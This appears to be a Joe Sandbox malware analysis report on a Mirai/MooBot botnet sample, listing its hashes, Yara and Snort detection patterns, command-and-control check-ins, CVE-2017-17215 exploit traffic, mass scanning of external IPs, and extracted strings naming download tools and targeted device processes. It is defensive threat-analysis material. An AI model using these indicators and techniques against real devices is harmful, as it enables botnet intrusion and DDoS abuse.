Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
yonariVpu7.elf

Overview

General Information

Sample name:yonariVpu7.elf
renamed because original name is a hash value
Original sample name:df911e5ac853eb81ebf1bb25c00be151.elf
Analysis ID:1374460
MD5:df911e5ac853eb81ebf1bb25c00be151
SHA1:c8ee0cdb385401a5caf1355d59b467ece51b3f0c
SHA256:86a53b674cf7c2829e1b9ad447103f20e8be59498d6412a7b387e4ba4cbcb241
Tags:32elfgafgytmotorola
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1374460
Start date and time:2024-01-14 16:17:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:yonariVpu7.elf
renamed because original name is a hash value
Original Sample Name:df911e5ac853eb81ebf1bb25c00be151.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@22/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: haha.skyljne.click
Command:/tmp/yonariVpu7.elf
PID:5446
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5459, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5459, Parent: 1588, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5465, Parent: 1400)
  • Default (PID: 5465, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5483, Parent: 1400)
  • Default (PID: 5483, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5494, Parent: 1)
  • systemd-user-runtime-dir (PID: 5494, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
yonariVpu7.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    yonariVpu7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      yonariVpu7.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x20f73:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20f87:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20f9b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20faf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20fc3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20fd7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20feb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x20fff:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21013:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21027:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2103b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2104f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21063:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21077:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2108b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2109f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210b3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210c7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210db:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x210ef:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x21103:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5446.1.00007fd104001000.00007fd104025000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5446.1.00007fd104001000.00007fd104025000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5446.1.00007fd104001000.00007fd104025000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x20f73:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20f87:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20f9b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20faf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20fc3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20fd7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20feb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x20fff:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21013:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21027:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2103b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2104f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21063:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21077:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2108b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2109f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210b3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210c7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210db:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x210ef:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x21103:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: yonariVpu7.elf PID: 5446JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: yonariVpu7.elf PID: 5446Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x496f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4983:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4997:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x49ab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x49bf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x49d3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x49e7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x49fb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a0f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a23:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a37:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a4b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a5f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a73:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a87:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4a9b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4aaf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4ac3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4ad7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4aeb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x4aff:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.13103.245.236.15249318199902030490 01/14/24-16:18:54.156402
            SID:2030490
            Source Port:49318
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15251474199902030490 01/14/24-16:18:14.087750
            SID:2030490
            Source Port:51474
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15251216199902030490 01/14/24-16:18:04.219426
            SID:2030490
            Source Port:51216
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13198.99.67.21355136372152835222 01/14/24-16:18:57.476061
            SID:2835222
            Source Port:55136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15251934199902030490 01/14/24-16:18:26.757195
            SID:2030490
            Source Port:51934
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15251988199902030490 01/14/24-16:18:29.587036
            SID:2030490
            Source Port:51988
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13198.99.67.21355136372152829579 01/14/24-16:18:57.476061
            SID:2829579
            Source Port:55136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15251156199902030490 01/14/24-16:18:02.359805
            SID:2030490
            Source Port:51156
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15240344199902030490 01/14/24-16:18:46.295295
            SID:2030490
            Source Port:40344
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15251668199902030490 01/14/24-16:18:17.952373
            SID:2030490
            Source Port:51668
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.13103.245.236.15256890199902030490 01/14/24-16:18:35.430685
            SID:2030490
            Source Port:56890
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: yonariVpu7.elfAvira: detected
            Source: yonariVpu7.elfReversingLabs: Detection: 52%
            Source: yonariVpu7.elfVirustotal: Detection: 55%Perma Link
            Source: yonariVpu7.elfString: Content-Length: wgetcurl/bin/busyboxechocatnano/proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-servershellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51156 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51216 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51474 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51668 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51934 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:51988 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:56890 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:40344 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:49318 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55136 -> 198.99.67.213:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55136 -> 198.99.67.213:37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.180.112.6:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 178.110.80.249:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.80.87.1:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 147.180.89.30:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 165.103.61.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 152.229.217.64:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.173.236.114:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 19.234.244.157:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.210.27.252:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.57.228.147:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.1.90.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.242.58.48:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 129.37.78.137:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.121.64.104:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.2.224.211:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.26.135.121:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 216.109.245.38:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.234.0.145:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.219.59.229:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.103.147.149:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.176.207.164:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.240.98.26:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 47.154.182.171:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.114.145.171:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.141.131.233:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 122.224.222.15:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.10.195.20:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 126.176.5.0:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.57.222.195:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.227.237.24:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.225.213.195:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.203.98.28:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.253.108.61:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 35.21.148.237:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.108.232.95:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.162.211.2:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 35.224.198.7:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.225.134.154:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.36.196.160:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.160.209.234:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 171.110.106.153:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.121.218.64:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 173.214.55.166:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.91.168.52:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 71.48.154.52:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.56.150.171:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.156.76.178:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.42.203.206:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.17.61.184:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.142.14.156:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 110.180.47.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.186.219.177:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.0.107.120:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.122.110.220:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.91.39.198:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.124.237.103:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.77.235.88:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.163.5.32:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.179.177.91:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 136.23.171.71:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.101.154.186:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.135.140.217:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.23.134.47:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.72.216.162:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.189.20.16:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.88.102.230:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.36.24.225:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.254.107.59:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.121.129.34:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.198.129.13:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.59.181.114:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 160.58.240.35:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.206.140.36:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.222.241.102:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.144.187.122:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.156.231.98:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.215.213.177:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 58.114.156.164:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.51.244.100:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.168.101.44:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 129.96.134.145:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.58.45.156:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.48.188.66:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.69.76.188:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.207.153.247:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.223.51.34:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.96.67.90:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.42.40.131:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.95.100.80:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.251.203.91:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.164.251.175:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 72.212.18.150:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.178.171.184:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.131.136.63:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 99.4.132.38:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.34.103.44:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 108.48.232.137:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 140.167.116.76:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.245.28.140:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 43.234.16.96:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 39.190.198.93:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.20.201.107:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.215.229.7:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.98.21.233:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.24.83.17:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.220.238.233:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 99.153.231.192:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.182.54.175:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.182.50.221:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 164.187.202.59:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.226.121.174:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.210.159.236:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.152.30.121:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 197.187.210.120:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.103.3.220:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 157.180.177.142:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 160.33.149.167:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 212.38.151.15:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 41.90.122.201:37215
            Source: global trafficTCP traffic: 192.168.2.13:49559 -> 152.116.212.81:37215
